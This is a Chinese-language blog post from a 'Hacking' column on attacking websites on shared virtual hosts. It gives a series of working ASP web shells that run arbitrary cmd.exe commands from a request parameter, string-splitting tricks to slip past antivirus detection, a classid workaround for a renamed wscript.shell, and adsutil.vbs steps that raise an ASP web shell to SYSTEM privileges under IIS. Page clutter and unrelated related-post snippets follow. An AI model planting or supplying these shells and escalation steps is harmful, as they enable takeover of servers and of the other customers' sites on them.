关于旁注虚拟主机 经验

最新推荐文章于 2022-02-25 21:57:21 发布
最新推荐文章于 2022-02-25 21:57:21 发布
阅读量458 收藏
点赞数
分类专栏: Hacking 文章标签: cmd asp system dll c object
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6591707
版权

拿虚拟机上的网站,echo是最好的办法了,如果asp的马cmd不能执行,可以换其他的试试,aspx的许可以,若还是不行,上传个cmd上去,有个专门执行cmd的后门程序

第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
第二个,更改zzzeva免fso的cmd.asp
代码如下:

<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

用法是xx.asp?cmd=net user
这样是为了得到结果排得方便,其实如果不为美观,还可以更短,那来第三个
第三个,缩短的cmd.asp

<%response.write server.createobject("wscript.shell").exec("cmd.exe /c "&request("cmd")).stdout.readall%>

这里用了response.write,变量用了cmd。为什么不更短呢?
第四个,更短的cmd.asp

<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

好像这就是最短的了。除了短,我们还要在别的地方下功夫。
第五个,wscript.shell被改名怎么办?
代码:

<ObjEct runat=sErvEr iD=kk scOpE=pagE classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8"></ObjEct>
<%=kk.exec("cmd /c "+request("cmd")).stdout.readall%>

当然,classid值在不同系统下有所不同。这个要自行更改

第六个,被一些杀asp木马的软件检测出来怎么办?
把变量拆开呀。代码:

<%=server.createobject("ws"+"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

<%=server.createobject("ws"&"cript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>

这里代码引号里的东东都可以随便拆的,像还可以拆成

<%=server.createobject("ws"&"cript.shell").exec("c"&"md.exe /c "&request("c")).stdout.readall%>

第7个,cmd.exe不让调用怎么办?
这个你自己上传一个cmd.exe,放在一个可以调用的目录下,代码更改如下:

<%=server.createobject("wscript.shell").exec("e:aspxcmD.EXE /c "&request("c")).stdout.readall%> 
第8个,asp代码可以加密吗?
当然可以

asp 马提权

asp.dll的执行权限是IWAM_computername 是GUEST组的,权限很低,所以,许多人上传了ASP木马,虾米也不能干

IIS的配置参数在 metabase.bin中,其中层LM/W3SVC/INPROCESSISAPIAPPS里,有一些ISAPI的文件
而这些文件运行是又inetinfo.exe启动 的,继承了system权限 (黑洞企业版运行也是system权限的)

所以,只要将不属于 LM/W3SVC/INPROCESSISAPIAPPS 的ASP。DLL加到LM/W3SVC/INPROCESSISAPIAPPS里就有了system权限


怎么办: 系统里有个adsuti.vbs可以对metabase.bin进行修改

而adsuti.vbs在C:\inetpub\AdminScripts里

所以,先跳转到 C:\inetpub\AdminScripts里

查看一下原来LM/W3SVC/INPROCESSISAPIAPPS里有哪些dll文件

cscript adsutil.vbs get W3SVC/INPROCESSISAPIAPPS

然后显示出的所有dll的路径都复制下来

然后用adsutil把asp.dll添加进去

输入 cscrip adsutil.vbs set W3SVC/INPROCESSISAPIAPPS "xxx/xx.dll" "xxx/xx.dll" "xxx/xx.dll" ··················(也就是上面叫你复制的那些dll的路径) 最后一个输入 "c:\winnt\system32\inetsrv\ASP.dll"

注意一下 :每个具体路径都要加引号 每个路径都要用空格隔开 

知道了这些.知道该如何防止ASP木马提权了吧

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB旁注爬虫
01-18
WEB旁注爬虫WEB旁注爬虫WEB旁注爬虫WEB旁注爬虫WEB旁注爬虫
旁注虚拟主机IIS权限重分配跨目录得webshell
Coisini的博客
06-12 270
国内的IDC运营商最常见的模式就是IIS搭配解析asp,有星外,新网,西数,华众等等。。。 这些虚拟主机提权都是相当难。最近小生在和习科核心渗透群里的一次渗透测试中,就遇到了一次,这里讲一下。 I)前奏 旁注,同服,虚拟主机服务器,只支持asp解析,aspx和php都不支持 最幸运的是,这个虚拟主机居然忘了禁用wscript 但是服务器上装了流氓软件360和杀毒软件诺顿,虽然我不太理解流氓软...
Apache+PHP环境下虚拟主机防被旁注
weixin_30399055的博客
04-22 53
IIS环境下比较容易实现,可以通过独立“匿名访问账户” + NTFS权限来防止。   查了一下,Apache下类似IIS的独立虚拟主机账户的方案貌似不太好实现,但有一种更简单的方法:   就是在VirtualHost节中通过添加   php_admin_value open_basedir /data/wwwroot/www.xxxxx.com   来限制当前虚拟...
旁注简介
Fly_鹏程万里
03-31 1174
旁注原理  旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。1、介绍旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-"从旁注入",利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。...
php星外提权,一次星外虚拟主机的提权
weixin_42509815的博客
03-13 351
今天看到个大马多功能防asp木马查杀内部测试版(有后门)看了下.换客网www.taoyuanbao.com小小检测了下绝对没啥可利用的。直接旁注几分钟拿下了个shell貌似运气好,随便打开个旁站。手工输入 fckeditor路径 …。存在…FCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/co...
长安刺客旁注杀手
04-09
换而不丧失语义的通用框架。既然是通用框架,应用程序设计者可以利用现成的通用RDF解析器。 资源描述框架(Resource Description Framework,RDF)是一个使用XML语法来表示的资料模型(Data model),用来描述Web资源的...
渗透入侵\tools旁注.zip
07-15
渗透入侵\tools旁注
同服旁注查询工具
05-16
好用的同服旁注查询工具,由于别的失效。一直在用这个。
旁注王V2.0
08-30
扫描的三种方式 网段扫描:任务-创建任务-解析IP-选段-配置-扫描 自定义扫描:任务-快捷扫描-每行一个IP-加入扫描 解析扫描:任务-创建任务-从文件中提取扫描-解析-完成
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8716
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3116
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
Android开发(1) | Fragment 的应用——新闻应用
Jormungand_V的博客
02-21 3571
文章目录 news_item.xml: <TextView xmlns:android="http://schemas.android.com/apk/res/android" android:id="@+id/news_title" android:layout_width="match_parent" android:layout_height="wrap_content" android:lines="1" android:ellipsize="
系统学习 TypeScript(四)——变量声明的初步学习
编程三昧
02-25 1474
认识了 TypeScript 中的基础类型,接下来当然是变量声明的相关学习了,我在这里记录一下我学习过程中的一些总结。
清除浮动的五种方法
weixin_52212950的博客
02-22 2168
为什么要清除浮动?因为往往浮动后的子元素因为脱离了标准流,不能自动撑起父元素的高度,所以会对后续布局产生影响,对此清除浮动不如理解为清除浮动产生的影响更为合理。 例如:我们设置了两个盒子如图所示,粉色为父盒子,只有宽度没有高度,蓝色盒子有宽有高,粉色盒子的高由蓝盒子的高度撑开。 但是给蓝色的子盒子设置了左浮动后,脱离了标准流,无法再撑开粉盒子,可以看到粉盒子高度变成了0; 清除浮动有五种方法: 直接设置父元素的高度 额外标签法 单伪元素法 双伪元素法 ove.
HTML实现学习网站首页
做技术,坚持才是最重要的,一时的热情只是暂时的进步
02-20 3892
项目访问 reset.css /* http://meyerweb.com/eric/tools/css/reset/ v2.0 | 20110126 License: none (public domain) */ html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del
C语言经典小游戏之----推箱子
嵌入式技术开发
02-25 4562
在进行推箱子的实验中,可以使用对应的API函数来改变对应箱子的颜色,也需要根据,人在移动的过程中,可以通过方向键,并改变对应的颜色,从而实现控制人物的目的。 代码实现如下: #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #include<conio.h> int x = 0, y = 0; //存储当前使用的...
关于Dubbo的mock=true降级无法调用降级类ServiceMock的解决方案
weixin_45754452的博客
02-25 1271
问题 消费者使用mock=“true”,想调用TestServiceMock进行服务降级无法调用 原因 我的项目结构如下,首先要知道服务降级代码应该是谁执行的,服务降级是服务消费者也就是controller包处对应的服务执行的,因为我只是测试dubbo怎么使用,所以并没有分多模块,但完全可以把一个包理解为一个模块,再看下面配置文件 为什么可以把一个包当成一个模块呢,因为我把配置文件的scan改成controller包然后启动一个服务器,即消费者,如果把scan改成service则可以启动服务提供者服务器
Vue---Vue基础
前端与计算机相关知识的分享,博主的qq523235674
02-25 1336
一.Vue概述 二.Vue的基本使用 2.1Vue.js之hello world 基本实例 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Document</title> </.
latex中如何设旁注
最新发布
07-09
在LaTeX中,可以使用脚注命令来创建旁注。以下是创建旁注的步骤: 1. 在导言区或文档开头添加以下命令,以启用旁注功能: ```latex \usepackage{marginnote} ``` 2. 在文档中需要添加旁注的地方,使用以下命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值